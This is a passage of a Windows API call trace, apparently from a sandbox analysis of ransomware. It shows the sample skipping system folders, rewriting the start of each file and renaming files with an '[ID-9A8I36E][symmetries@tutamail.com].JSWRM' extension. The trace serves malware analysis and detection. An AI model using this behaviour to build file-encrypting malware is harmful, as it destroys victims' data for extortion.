"c:\\588bce7c90097ed212\\netfx_core_x86.msi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0061.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0061.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0061.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0061.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0061.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0061.853] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2=".") returned 1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="..") returned 1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="...") returned 1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="windows") returned -1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="recovery") returned -1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="perflogs") returned -1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="documents and settings") returned 1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="$RECYCLE.BIN") returned 1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="system volume information") returned -1 [0061.853] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="msocache") returned 1 [0061.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0061.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended.mzz", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0061.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0061.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended.mzz", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Extended.mzz", lpUsedDefaultChar=0x0) returned 18 [0061.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0061.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0061.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended.mzz", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0061.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0061.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended.mzz", cchWideChar=18, lpMultiByteStr=0x241060, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Extended.mzz", lpUsedDefaultChar=0x0) returned 18 [0061.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0061.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0061.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0061.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0061.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0061.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0061.854] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0061.854] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=43131591) returned 1 [0061.854] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0061.854] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0061.895] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.895] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0061.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0061.896] CloseHandle (hObject=0x450) returned 1 [0062.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0062.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0062.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0062.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0062.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0062.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0062.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0062.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0062.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.562] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0062.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0062.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0062.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0062.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0062.563] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0062.563] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2=".") returned 1 [0062.563] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="..") returned 1 [0062.563] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="...") returned 1 [0062.563] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="windows") returned -1 [0062.563] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="recovery") returned -1 [0062.563] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="perflogs") returned -1 [0062.564] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="documents and settings") returned 1 [0062.564] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="$RECYCLE.BIN") returned 1 [0062.564] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="system volume information") returned -1 [0062.564] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="msocache") returned 1 [0062.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended_x64.msi", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0062.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0062.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended_x64.msi", cchWideChar=22, lpMultiByteStr=0x2412e0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Extended_x64.msi", lpUsedDefaultChar=0x0) returned 22 [0062.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended_x64.msi", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0062.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0062.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended_x64.msi", cchWideChar=22, lpMultiByteStr=0x2413a8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Extended_x64.msi", lpUsedDefaultChar=0x0) returned 22 [0062.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0062.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0062.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0062.564] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.565] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=872448) returned 1 [0062.565] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0062.565] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0062.577] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.577] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0062.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.578] CloseHandle (hObject=0x450) returned 1 [0062.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0062.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0062.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0062.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0062.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217eb0 [0062.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0062.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0062.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217eb0 | out: hHeap=0x1e0000) returned 1 [0062.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.597] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0062.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0062.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0062.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0062.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0062.598] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2=".") returned 1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="..") returned 1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="...") returned 1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="windows") returned -1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="recovery") returned -1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="perflogs") returned -1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="documents and settings") returned 1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="$RECYCLE.BIN") returned 1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="system volume information") returned -1 [0062.598] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="msocache") returned 1 [0062.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended_x86.msi", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0062.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0062.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended_x86.msi", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Extended_x86.msi", lpUsedDefaultChar=0x0) returned 22 [0062.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended_x86.msi", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0062.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0062.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Extended_x86.msi", cchWideChar=22, lpMultiByteStr=0x2411c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Extended_x86.msi", lpUsedDefaultChar=0x0) returned 22 [0062.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0062.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0062.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0062.599] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.599] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=495616) returned 1 [0062.599] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0062.599] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0062.620] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.620] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0062.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.620] CloseHandle (hObject=0x450) returned 1 [0062.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0062.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0062.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0062.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0062.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216ac0 [0062.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0062.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0062.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216ac0 | out: hHeap=0x1e0000) returned 1 [0062.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.630] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0062.630] HeapFree (in: hHeap=0x1e0000, 